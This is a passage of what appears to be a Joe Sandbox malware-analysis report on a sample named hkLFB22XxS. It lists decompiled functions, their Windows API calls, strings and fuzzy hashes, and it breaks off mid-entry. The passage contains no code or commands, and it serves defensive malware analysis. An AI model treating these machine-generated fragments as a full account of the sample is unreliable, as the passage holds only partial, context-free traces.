                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00877523
                                                            • LeaveCriticalSection.KERNEL32(?,?,00821044,?,?), ref: 0087752A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: c0042aa12aa60854c8fe017ed09958ee82f6a06e4f412203264bd4099be945e7
                                                            • Instruction ID: 95d72a9690ee6ef5551057c108fdbffccce256b2d14a374fde102501676ac9ed
                                                            • Opcode Fuzzy Hash: c0042aa12aa60854c8fe017ed09958ee82f6a06e4f412203264bd4099be945e7
                                                            • Instruction Fuzzy Hash: F1F03A3A144612ABDB162BA4EC88AEA772AFF45302B180533F206D10A6DB756811CBA0
                                                            Function 00868E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00868E7F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00868E8B
                                                            • CloseHandle.KERNEL32(?), ref: 00868E94
                                                            • CloseHandle.KERNEL32(?), ref: 00868E9C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00868EA5
                                                            • HeapFree.KERNEL32(00000000), ref: 00868EAC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 9f068c5250fa2d2ba694491969b151c1e50a1186459603d288376f9800dbf2b7
                                                            • Instruction ID: 88826246157d0ad0e20ce83aa2d8895afecbb3bad2c49ab91ea978e84197c236
                                                            • Opcode Fuzzy Hash: 9f068c5250fa2d2ba694491969b151c1e50a1186459603d288376f9800dbf2b7
                                                            • Instruction Fuzzy Hash: 42E0C236004001FFDA062FF1EC0C90ABB69FB89322B288232F319C1171CB329420EB90
                                                            Function 00888902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00888928
                                                            • CharUpperBuffW.USER32(?,?), ref: 00888A37
                                                            • VariantClear.OLEAUT32(?), ref: 00888BAF
                                                              • Part of subcall function 00877804: VariantInit.OLEAUT32(00000000), ref: 00877844
                                                              • Part of subcall function 00877804: VariantCopy.OLEAUT32(00000000,?), ref: 0087784D
                                                              • Part of subcall function 00877804: VariantClear.OLEAUT32(00000000), ref: 00877859
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 123d927bf0c704ca493f3d5b97157ebb850318c94e1a073739750b54ee0eacfe
                                                            • Instruction ID: eedbcb63c92d546a53e75e664f082e5b194b71670401d84f8e7e87ba923edd81
                                                            • Opcode Fuzzy Hash: 123d927bf0c704ca493f3d5b97157ebb850318c94e1a073739750b54ee0eacfe
                                                            • Instruction Fuzzy Hash: 5C913871608305DFC714EF28C58496ABBE8FF89354F04496EF89ACB262DB31E945CB52
                                                            Function 00872F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                            • _memset.LIBCMT ref: 00873077
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008730A6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00873159
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00873187
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 03cfb7e277718d4c9ba0eb307fa842e9f6f38afdb5e718cda556846f00a3971c
                                                            • Instruction ID: 47183c19d05627281d29e84b935b8f67138be089b1ee3eb506eedc84325d3aac
                                                            • Opcode Fuzzy Hash: 03cfb7e277718d4c9ba0eb307fa842e9f6f38afdb5e718cda556846f00a3971c
                                                            • Instruction Fuzzy Hash: 5851E3316083009FD7259F28C845A6BB7E8FF95314F448A2EF899D3295DB70CE44A7A3
                                                            Function 0086DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0086DAC5
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0086DAFB
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0086DB0C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0086DB8E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: d227cd7630bf9fb0279239921441d682718aada1ce0c319714a1267616311cd4
                                                            • Instruction ID: eb48945cb4d22c940a0b111885b003d3eca1273fd83328ceb238e74bfa9163a9
                                                            • Opcode Fuzzy Hash: d227cd7630bf9fb0279239921441d682718aada1ce0c319714a1267616311cd4
                                                            • Instruction Fuzzy Hash: FB417171A00309DFDB15DF54D884A9A7BB9FF85360F1680AAAD05DF20AD7B1D944CBA0
                                                            Function 00872C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872CAF
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00872CCB
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00872D11
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008D6890,00000000), ref: 00872D5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 98152a5ed2be9c399c131e45497c08d31170b91be2d9c2b83d3a37215727b7e8
                                                            • Instruction ID: e1d94f1f828f1e558ccc0c88909bb4aa438f1b8b194ac34a9421089f0454d371
                                                            • Opcode Fuzzy Hash: 98152a5ed2be9c399c131e45497c08d31170b91be2d9c2b83d3a37215727b7e8
                                                            • Instruction Fuzzy Hash: 4E4191302053059FD724DF28C885B5ABBE8FF85320F14866EF969D7295D770E904CB92
                                                            Function 0088DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0088DAD9
                                                              • Part of subcall function 008179AB: _memmove.LIBCMT ref: 008179F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 8b34d42a0261c73912c9cd8018a0afe6a3951fa4abaada0015c1fa8a3bfbd617
                                                            • Instruction ID: f40b1fc9eb6d69f901f0497829e00bfd399bf4b6ade7c23c9fa4058bc9c93e7b
                                                            • Opcode Fuzzy Hash: 8b34d42a0261c73912c9cd8018a0afe6a3951fa4abaada0015c1fa8a3bfbd617
                                                            • Instruction Fuzzy Hash: 93317070500619ABCF10EF98C8919EEB3B9FF55320B108A69E865E76D1DB31E906CB81
                                                            Function 00869372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008693F6
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00869409
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00869439
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: ba2e3fb541277d37590f7734750eeaddfb7a26c09b3afa2156cb8769f36c369c
                                                            • Instruction ID: ebbfadcdf0d8ba33865b5b886e7baa25db56da7d4dc16925058abb53cb67daac
                                                            • Opcode Fuzzy Hash: ba2e3fb541277d37590f7734750eeaddfb7a26c09b3afa2156cb8769f36c369c
                                                            • Instruction Fuzzy Hash: 1F210471A00108BADB18ABB8DC85DFFB77CFF45310B154119F965D72E1DF38494A9611
                                                            Function 00881B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00881B40
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00881B66
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00881B96
                                                            • InternetCloseHandle.WININET(00000000), ref: 00881BDD
                                                              • Part of subcall function 00882777: GetLastError.KERNEL32(?,?,00881B0B,00000000,00000000,00000001), ref: 0088278C
                                                              • Part of subcall function 00882777: SetEvent.KERNEL32(?,?,00881B0B,00000000,00000000,00000001), ref: 008827A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: f8e6340531e819c9beaf7172b52b156aca3e790e15e80b0eb9be0ac2c2ef3baa
                                                            • Instruction ID: a07f6a440f6445bf043c92109ee805f0c496d25f4d8036fc9f5c75d8bbdd8a17
                                                            • Opcode Fuzzy Hash: f8e6340531e819c9beaf7172b52b156aca3e790e15e80b0eb9be0ac2c2ef3baa
                                                            • Instruction Fuzzy Hash: CD219FB1500208BFEB11BF659CC9EBF77ECFB49758F10412AF505E6241EE209D069761
                                                            Function 00896656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00811D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00811D73
                                                              • Part of subcall function 00811D35: GetStockObject.GDI32(00000011), ref: 00811D87
                                                              • Part of subcall function 00811D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00811D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008966D0
                                                            • LoadLibraryW.KERNEL32(?), ref: 008966D7
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008966EC
                                                            • DestroyWindow.USER32(?), ref: 008966F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 4d16260d770fda5a1d0bcc7ece62e4daadf03db58bee686193d3cb906cc030c5
                                                            • Instruction ID: 5ba279d790ae4f270b0598c32413e5647da92a08c2e86ea029fa1d32a482175d
                                                            • Opcode Fuzzy Hash: 4d16260d770fda5a1d0bcc7ece62e4daadf03db58bee686193d3cb906cc030c5
                                                            • Instruction Fuzzy Hash: CB218E71200209BBEF116E64EC80EBB37ADFB69368F184629FA11D2190E771CC619760
                                                            Function 0087703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 0087705E
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00877091
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 008770A3
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008770DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: f312a1af4666083dc8b0685b93e71b144c6f02d65fbec1225dff6d1c3c70c7c1
                                                            • Instruction ID: 9fd0e2ade2ca64baa377737c6fd24758656857814f4a0392c8b8d6774354999e
                                                            • Opcode Fuzzy Hash: f312a1af4666083dc8b0685b93e71b144c6f02d65fbec1225dff6d1c3c70c7c1
                                                            • Instruction Fuzzy Hash: AB219F74604609ABDF209F38DC04A9A77A8FF54724F24861AF9A4D72D4E771D850CB50
                                                            Function 0087710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0087712B
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0087715D
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0087716E
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008771A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: f0b96f6a6d307d167761046bca61c5c95eaec85a8e7ae3b5997cc1a65dff381c
                                                            • Instruction ID: 56efdd18f3e03da1aa51f17125ad230a20f023cc412dfc74c2371b81b35cdac5
                                                            • Opcode Fuzzy Hash: f0b96f6a6d307d167761046bca61c5c95eaec85a8e7ae3b5997cc1a65dff381c
                                                            • Instruction Fuzzy Hash: B021C1715042099BDF209F689C04AAAB7A8FF55324F60861AFDB8D32D4EB70D851CB61
                                                            Function 0087AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087AEBF
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0087AF13
                                                            • __swprintf.LIBCMT ref: 0087AF2C
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0089F910), ref: 0087AF6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 9aa9aa2bac5292701b277ea1e6a1b346b0a4eb4c52ff12d6ba00d8b9464350f1
                                                            • Instruction ID: 9210fa0c1eae635aacfe60349975046c25ee9ae7bd1458e19e41fe84c7fc791c
                                                            • Opcode Fuzzy Hash: 9aa9aa2bac5292701b277ea1e6a1b346b0a4eb4c52ff12d6ba00d8b9464350f1
                                                            • Instruction Fuzzy Hash: 42214430600119AFCB14EF58CD85DEE7BB8FF89714B144069F949EB252DB71EA41CB62
                                                            Function 0086A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                              • Part of subcall function 0086A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0086A399
                                                              • Part of subcall function 0086A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0086A3AC
                                                              • Part of subcall function 0086A37C: GetCurrentThreadId.KERNEL32 ref: 0086A3B3
                                                              • Part of subcall function 0086A37C: AttachThreadInput.USER32(00000000), ref: 0086A3BA
                                                            • GetFocus.USER32 ref: 0086A554
                                                              • Part of subcall function 0086A3C5: GetParent.USER32(?), ref: 0086A3D3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0086A59D
                                                            • EnumChildWindows.USER32(?,0086A615), ref: 0086A5C5
                                                            • __swprintf.LIBCMT ref: 0086A5DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                            • String ID: %s%d
                                                            • API String ID: 1941087503-1110647743
                                                            • Opcode ID: 182278c130749036a921245f3c310154bf7f6fbf573ebb68330bd63a6edbf936
                                                            • Instruction ID: 5ee8549ccfda27a90dbc1ec6b7947ec5cc59c687ffa44b71bb7888494cfcc02a
                                                            • Opcode Fuzzy Hash: 182278c130749036a921245f3c310154bf7f6fbf573ebb68330bd63a6edbf936
                                                            • Instruction Fuzzy Hash: CC1190712002086BDF157FA8ED85FEA777CFF48704F044079BA18EA252CA7499458B76
                                                            Function 00872017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00872048
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 1f6a59968bef247e7c72ba54edd17769c1de40484eb90d805b6a0334dce9beb2
                                                            • Instruction ID: 7fa32a819df2f49cbe33577e66f43487bac893720e00901aa3b6aad202c8955c
